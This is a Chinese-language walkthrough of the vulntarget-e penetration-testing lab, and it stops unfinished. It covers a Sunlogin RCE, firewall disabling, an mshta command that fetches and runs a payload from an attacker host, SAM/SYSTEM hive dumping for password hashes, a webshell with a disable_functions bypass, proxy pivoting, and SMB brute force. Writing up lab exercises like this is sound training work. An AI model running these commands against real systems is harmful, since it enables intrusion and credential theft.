vulntarget-e

一.打靶过程

1.外网打点

向日葵rce

nmap -T4 -sV -O -p 0-65535 192.168.126.130

访问了49773端口后只有这个页面，只能扫描一下目录看看，但是扫出来也都是跳转到这个页面
扫一下指纹信息，发现是向日葵(这里我自己扫不出来，俊贤哥说向日葵端口是变化的的自己写识别)
未授权的路径：/cgi-bin/rpc 授权的路径 /cgi-bin/login.cgi

确实存在漏洞，直接工具
关闭防火墙：netsh advfirewall set allprofiles state off
开启防火墙：netsh advfirewall set allprofiles state on

window下载木马

开启python传输后
mshta http://xxxx.xxx.xxx.xx:8000/1.hta
此命令直接下载和自动执行

进程迁移

run post/windows/manage/migrate

再添加个路由

msf返回乱码问题

shell输入chcp 65001即可

2.外网win机信息收集

net time一下，不在域内，并且查看了内网的ip

翻文件

查看桌面文件，一个一个目录从c盘根目录开始找

download的坑(win和linux目录斜杠区别)

window用\或者/
linux用\

arp收集内网ip

192.168.100.131

kiwi的坑（抓密码）

kiwi只有administrator权限还不够，得执行getsystem，用system权限跑


发现只能读取到管理员用户的hash，解密后的密码是 win2008，目前还需要读取普通用户的hash，为的是方便为了做爆破的时候做字典，既然这样不能读取，直接抓下来本地读取
命令行
reg save hklm\sam sam.hive
reg save hklm\system system.hive  
使用kiwi的lsa_dump_sam

3.探测内网Ubuntu主机

先把win2016防火墙关了

netsh Firewall show state  #查看防火墙状态
netsh advfirewall set allprofiles state off 关闭防火墙

挂上代理，配置proxychain4
use auxiliary/server/socks_proxy
run
vim /etc/proxychains4.conf

代理nmap扫描内网主机
proxychains4 nmap -Pn -T4 -sT -p- 192.168.100.131

访问80端口发现400
访问8888端口，可以看到是宝塔的

开启dirsearch扫目录

发现一直400，这时候就想到了前面收集到的域名地址
并且桌面还有个firefox，看看有没有浏览器历史记录

查看浏览器记录

run post/windows/gather/forensics/browser_history

在路径里找到文件右键用sqlite打开

轮流访问一下

都是400，应该是需要host碰撞

host碰撞

很多时候访问目标资产响应多为: 401、403、404、500，但是用域名请求却能返回正常的业务系统，因为这大多数 都是需要绑定host才能正常请求访问的 (目前互联网公司基本的做法)，那么我 们就可以通过收集到的目标的内网域名和 目标资产的IP段组合起来，以IP段+域名的 形式进行捆绑碰撞，就能发现很多有意思 的东西。这一操作可以通过脚本自动化来 访问:
https://github.com/r35tart/Hosts_scan
要走proxychain代理去跑工具
跑完工具后利用火狐的modheader拓展修改host访问浏览器历史翻到的路径
成功访问到后发现是thinkphp，直接rce，但我这边靶场出现意外，这一步直接跳过，在靶机上写个一句话连接

获取linux位数命令

getconf LONG_BIT

bypass disable function(蚁剑的解码器)

很烦这里卡了好久，phpinfo看了一眼disable function，都被禁了除了eval
原来是wp一句话写了三次的编码，所以要用他三次解码的蚁剑的解码器，自定义的这里
这里很奇怪，不用url编码解码器连接就一直超时

这里的bypass很奇怪，用脚本也一直不行，然后蚁剑所有bypass的功能试了一遍又突然就可以了，只能说玄学

proxychain打开msf

可以命令执行之后就上线msf，这里直接使用proxychains代理打开msf，就不用做什么代理转发上线了

ssh利用key免密登录提权

proxychains ssh -i key [email protected]

netstat -an|grep:22可以看22端口连接情况，输入who查看用户信息

代理通过两个跳板机扫描

frp搭建多层代理

https://moments.blog.csdn.net/article/details/127190123?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7EYuanLiJiHua%7EPosition-1-127190123-blog-106697369.pc_relevant_landingrelevant&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7EYuanLiJiHua%7EPosition-1-127190123-blog-106697369.pc_relevant_landingrelevant&utm_relevant_index=1

九头蛇爆破smb445端口

wmiexec登录smb执行命令

smbclient登录smb

put命令传输文件，把文件放在wmmiexec目录下
当时大二打这个靶场环境有点问题，做到这停了，后面有机会补上